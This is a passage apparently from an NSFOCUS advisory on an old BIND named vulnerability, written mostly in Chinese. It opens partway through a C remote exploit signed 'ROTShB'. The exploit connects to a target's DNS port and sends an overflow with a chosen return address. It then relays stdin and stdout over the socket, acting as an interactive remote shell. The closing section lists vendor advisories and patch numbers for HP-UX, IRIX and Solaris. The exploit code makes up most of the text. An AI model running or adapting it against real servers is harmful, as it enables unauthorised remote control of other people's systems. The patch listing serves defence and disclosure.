        }
    }
  else
    ti = DEFAULT_TARGET;

  if(argc>3)
    {
      opt = atoi(argv[3]);
      if((opt!=0)&&(opt!=1))
        {
          (void)fprintf(stderr,"error: invalid optimization setting %d\n",opt);
          exit(-1);
        }
    }

  if(argc>4)
    offset = atoi(argv[4]);


  /* resolve() returns 0 on failure. */
  if(!(sa.sin_addr.s_addr=resolve(argv[1])))
    {
      (void)fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
      exit(-1);
    }

  sa.sin_family = AF_INET;
  sa.sin_port   = htons(53);

  if((sock=socket(sa.sin_family,SOCK_STREAM,0))==(-1))
    {
      (void)perror("error: socket");
      exit(-1);
    }

  if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))
    {
      (void)perror("error: connect");
      exit(-1);
    }

  /* i (an int) is reused here to hold the selected address for the two
   * printf lines; it narrows the unsigned long on a 64-bit build. */
  (void)printf("target             : %s\n",inet_ntoa(sa.sin_addr));
  (void)printf("target type        : %s\n",target[ti].desc);
  (void)printf("optimized named    : %s\n",(opt?"YES":"NO"));
  (void)printf("anbuff addr        : 0x%x\n",(unsigned int)
               (i=(opt?target[ti].opt_addr:target[ti].addr)));
  (void)printf("anbuff addr offset : %lu\n",offset);
  (void)printf("ret addr           : 0x%x\n",(unsigned int)(i+offset));
  (void)printf("fd to make dups of : %d\n",target[ti].fd);

  (void)printf("here we go...\n");

  /* attack() returns -1 on a write error, 0 for an unsupported systype,
   * 1 after the send; the break statements after exit are unreachable. */
  switch(attack(sock,target[ti],offset,opt))
    {
    case -1:
      (void)perror("error: attack");
      exit(-1);
      break;

    case 0:
      (void)fprintf(stderr,"error: internal error\n");
      exit(-1);
      break;
    }

  (void)printf("have fun.\n");
  (void)printf("-ROTShB\n");

  /* Relay loop.  Each direction is read only while its buffer has room
   * (sizeof-1) and written only while it holds data.  ti is reused as
   * select()'s ready count: every serviced descriptor decrements it and the
   * loop restarts as soon as it reaches zero.  EOF on either input ends
   * the loop; read/write errors exit. */
  while(1)
    {
      FD_ZERO(&rd);
      if(ylen<(sizeof(ybuf)-1))
        FD_SET(sock,&rd);
      if(xlen<(sizeof(xbuf)-1))
        FD_SET(fileno(stdin),&rd);

      FD_ZERO(&wr);
      if(xlen)
        FD_SET(sock,&wr);
      if(ylen)
        FD_SET(fileno(stdout),&wr);

      if((ti=select((sock+1),&rd,&wr,NULL,NULL))==(-1))
        {
          (void)perror("error: select");
          break;
        }

      if(FD_ISSET(fileno(stdin),&rd))
        {
          if((i=read(fileno(stdin),(xbuf+xlen),(sizeof(xbuf)-xlen)))==(-1))
            {
              (void)perror("error: read");
              exit(-1);
            }
          else if(i==0)
            break;

          xlen += i;
          if(!(--ti)) continue;
        }


      if(FD_ISSET(sock,&wr))
        {
          /* A short write is treated as an error, not retried. */
          if(write(sock,xbuf,xlen)!=xlen)
            {
              (void)perror("error: write");
              exit(-1);
            }

          xlen = 0;
          if(!(--ti)) continue;
        }

      if(FD_ISSET(sock,&rd))
        {
          if((i=read(sock,(ybuf+ylen),(sizeof(ybuf)-ylen)))==(-1))
            {
              (void)perror("error: read");
              exit(-1);
            }
          else if(i==0)
            break;

          ylen += i;
          if(!(--ti)) continue;
        }

      if(FD_ISSET(fileno(stdout),&wr))
        {
          if(write(fileno(stdout),ybuf,ylen)!=ylen)
            {
              (void)perror("error: write");
              exit(-1);
            }

          ylen = 0;
          if(!(--ti)) continue;
        }
    }

  if(close(sock)==(-1))
    {
      (void)perror("error: close");
      exit(-1);
    }

  exit(0);
}

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 没有合适的临时解决方法。

厂商补丁:

HP
--
HP已经为此发布了一个安全公告(HPSBUX9808-083)以及相应补丁:
HPSBUX9808-083:Security Vulnerability in BIND on HP-UX
链接:

补丁下载:

ftp://us-ffs.external.hp.com/hp-ux_patches

操作系统及补丁号:

HP-UX release  9.0, 9.01, 9.03, 9.04, 9.05, & 9.07: PHNE_13187

HP-UX release  10.00, 10.01, 10.10 and 10.20:       PHNE_14617

--->>> HP-UX release  10.16:                              *PHNE_16232

HP-UX release  10.24:                             **PHNE_16204

HP-UX release  11.00:                               PHNE_12957

SGI
---
SGI已经为此发布了一个安全公告(19980603-01-PX)以及相应补丁:
19980603-01-PX:IRIX BIND DNS Vulnerabilities
链接:ftp://patches.sgi.com/support/free/security/advisories/19980603-01-PX

补丁下载:

http://support.sgi.com/
ftp://patches.sgi.com/support/patchset/

补丁情况:

系统版本       是否受影响      补丁号    
----------     -----------     ---------    

IRIX 3.x          yes          not avail
IRIX 4.x          yes          not avail
IRIX 5.0.x        yes          not avail
IRIX 5.1.x        yes          not avail
IRIX 5.2          yes          not avail
IRIX 5.3          yes           3123
IRIX 6.0.x        yes          not avail
IRIX 6.1          yes          not avail
IRIX 6.2          yes           3117
IRIX 6.3          yes           2740
IRIX 6.4          yes           2741
IRIX 6.5          no

Sun
---
Sun已经为此发布了一个安全公告(Sun-00180)以及相应补丁:
Sun-00180:BIND
链接:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/180&type=0&nav=sec.sba

补丁下载:

http://sunsolve.sun.com/sunsolve/pubpatches/patches.html

操作系统版本及对应的补丁号:

操作系统            补丁号    
_________________   _________
Solaris 2.6         105755-07
Solaris 2.6_x86     105756-07
Solaris 2.5.1       103663-15
Solaris 2.5.1_x86   103664-15
Solaris 2.5         103667-11
Solaris 2.5_x86     103668-11
Solaris 2.4         102479-13
Solaris 2.4_x86     102480-11
Solaris 2.3         101359-10
SunOS 4.1.4         106866-02
SunOS 4.1.3_U1      106865-02
